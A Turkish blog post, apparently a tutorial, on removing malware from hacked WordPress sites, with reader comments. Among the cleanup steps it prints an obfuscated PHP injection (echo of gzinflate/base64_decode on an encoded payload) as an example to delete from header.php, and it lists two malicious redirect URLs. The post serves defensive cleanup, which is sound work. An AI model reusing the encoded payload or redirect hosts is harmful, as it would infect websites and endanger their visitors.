WordPress Malware Temizleme
Siteniz tarayıcılarda zararlı içerikli site olarak engellenmekteyse (Google safe browsing) veya aşağıda yer alan sitelere yönlendirilmekteyse veya virüs tarayıcı tarafından iframe içerikli virüs tespit edilmekteyse yapmanız gereken ciddi adımlar bulunmaktadır. Bunları uygulamadığınız takdirde sitenize giren kişiler malware tarzı virüslerden etkilenecek ve muhtemelen siteniz ulaşılabilir olmayacaktır. Sitenizin ana erişim tanımlarında zararlı yönlendirmeler bulunduğundan ve temanıza da yönlendirme kodları enjekte edildiğinden ciddi bir problemle karşı karşıya olduğunuzu söylemeliyim. Şu an binlerce wordpress temelli site hacklenmiş durumda ve benzeri zararlı kodlarla başı belada.
Aşağıda anlatacaklarım gayet teknik konulardır. Bu konularda yardım almanız gerekebilir. Benimle iletişim kurarsanız elimden geldiğince sizlere yardımcı olmaya da çalışırım.
Ayrıca ücretli profesyonel hizmet almak istiyorsanız fiverr üzerinden bunu yapabilirsiniz.
- Öncelikle sitenizde virüs bulunup bulunmadığını http://sitecheck.sucuri.net üzerinden kontrol ediniz. Burada “site infected with malware” gibi bir uyarıyla karşılaşıyorsanız sitenizin virüs barındırdığından emin olabilirsiniz.
- Hemen cpanel veya whm panel şifrenizi değiştiriniz. Bu önemli bir adım.
- Sitenize filezilla gibi bir ftp uygulamasıyla bağlanarak .htaccess dosyanızı düzenleyiniz. Burada yapmanız gereken tüm kodları silmek ve temiz bir örnek ile dosyanızı değiştirmektir.Temiz .htaccess örneğini aşağıda görebilirsiniz.
- Ardından temanızın bulunduğu klasöre geçiniz ve büyük ihtimalle virüsün bozmuş olduğu header.php dosyasını düzenleyiniz. Burada yapmanız gereken wp_head(); ?> tagi üstünde yer alan garip gurup kodları silmektir. Örnek sildiğim kodları aşağıda görebilirsiniz.
- Tekrar 1. maddedeki virüs tarayıcı uygulaması ile sitenizi taratınız ve “clean” mesajını aldığınızdan emin olunuz.
- Geçmiş olsun.
Temiz .htaccess örneği
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
# BEGIN WordPress
# END WordPress
header.php içinde silinmesi gereken örnek zararlı kodlar bloğu
#c3284d#
echo(gzinflate(base64_decode(“VVHBboMwDL1X4h9yC2hdKDCVbqOVummHnfYB64RCYkokmqSJS9t9/YChavPN9nt+9nPhhVMWN8Gs446UR7Im0ojTATQy4YAjvLUwZCFVteMHoNE8mJE+St1jqQfcIjpVnRDoczArj5+l/gqpd4LOCW0Q7VMcC15xrbiHFiRoJsyBcRd75OiZbSyNRibzeG2BWeMVKjOO55U37W30BDgric3QTVJ7+Ss6LlgZJ8H14pp3as/ROHby4Lb74SSlJVw+6pBmjyLL0uWiXsp8mSeQSg55vVjJZLHKIU1pRO5I8m+vFmocVO8fsjT/Fb5ZdXYKIaSFVB1Rcr2j9hu47HZ0U8R9bTNeeEPvASdXX67vMpzANGLcWtDytVGtDMvjwCni6UE/”)));
#/c3284d#
Virüsün sağlamaya çalıştığı örnek Yönlendirmeler:
http://creativeironart.net/images/stats.php
http://cabaniaseleden.com.ar/stats.php
Merhaba sitenize bir müşterimin karşılaştığı malware sorunu ile ilgili yönlendirmesi ile ulaştım yazınızı kendi karalama defterim olarak kullandığım (blogger üzeirnde) siteme ekledim.
http://birhost.blogspot.com/2012/07/wordpress-joomla-mlaware-temizleme.html
Altında sizin sitenize ait olduğu hakkında orjinal link var. Emekleriniz için teşekkür ederim.
Bilgiler için teşekürler,
Elimde yedeği olan iki dosyayı geri yüklemem sorunu çözdü.
http://sitecheck.sucuri.net hakkında yazmak istedim.
Site güncel tarama yapmıyor. Şu anda bu siteye göre hala malware varken Google Web Yöneticisi Araçları na göre sitem temiz. Bilginzie.
Selamlar,
Sucuri bu konuda gayet güvenilir tarama yapmaktadır. Güncelleme problemi için “This site was just scanned a few minutes ago.Force a Re-scan to clear the cache. ” yazan yazıda re-scan diyerek tekrar taratabilirsiniz. Ben de merakla tarattım ve gördüm ki “MW:IFRAME:HD202?Nuclear” malware mevcut. Bir an önce temanızı değişmenizi ya da temizlemenizi öneriyorum.Sucuri hangi dosyalarda muhtemel injection olduğunu göstermektedir.
Evet bu kısmı gözden kaçırmışım.
Eski bir yedeği yükleyip güncelliyorum şu anda sorun yok gözüküyor. Bakalım yarın ne gösterecek.
*This site was just scanned a few minutes ago.Force a Re-scan to clear the cache.
Benım sıtemede vırus bulaştı nasıl çözecegımı bılemıyorum